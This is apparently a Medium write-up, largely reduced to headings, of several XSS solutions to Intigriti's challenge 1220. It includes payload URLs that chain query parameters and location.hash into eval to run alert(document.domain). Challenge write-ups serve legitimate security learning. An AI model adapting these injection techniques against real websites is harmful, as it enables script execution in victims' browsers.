3 and a half solutions for Intigriti’s challenge 1220

The rules

Let’s get started!

A leet calculation

Time to check the source code

An initial thought

So what you can set a variable?

thisFunction=thatFunction
https://challenge-1220.intigriti.io/?num1=calc&operator=%3D&num2=alert
https://challenge-1220.intigriti.io/?num1=calc&operator=%3D&num2=alert

Approaching a solution

decodeURIComponent=alert

Try harder

Found here

Let’s just not refresh

https://challenge-1220.intigriti.io/#?num1=calc&operator=%3d&num2=alert
location.hash = "?num1=document.domain"
A moment of confusion
location.hash = "?&num1=document.domain"
*facepalm*

Eval to the rescue

That’s better

Solution #1

A moment of relief

Title

A beautiful moment

Solution #2 | No user-interaction

Even more beautiful!

Solution #3 | An unintended solution

https://challenge-1220.intigriti.io/?num1=calc&operator=%3d&num2=eval&#?num1=alert(document.domain)
calc=eval
https://challenge-1220.intigriti.io/#?num1=alert(document.domain)

Solution #3.5 | A different approach to getting XSS

location=searchQueryString

--

--

--

Bug Bounty Hunter

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Sharing state between AngularJS and Angular v6 with Redux

How to go from Callbacks to Async Await in Node

Detect JSON Insecure Deserialization Threats in JavaScript

Keycloak, OpenShift, and Emails: A Tale of Links With Wrong Base URLs

Building “Mastermind” in React

Find First Negative Number in Every subarray of Size k using Sliding Window Algorithm

[Learning] #18 JS: Intro to function

Getting started with automation testing and Nightwatch.js

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
holme

holme

Bug Bounty Hunter

More from Medium

Simple CTF Walkthrough — TryHackMe

Exploiting XSS to Steal Cookies (Portswigger Web Security Academy)

Linux PrivEsc — TryHackMe Jnr Pentester Path

TRY HACK ME: Write-Up Exploiting Log4j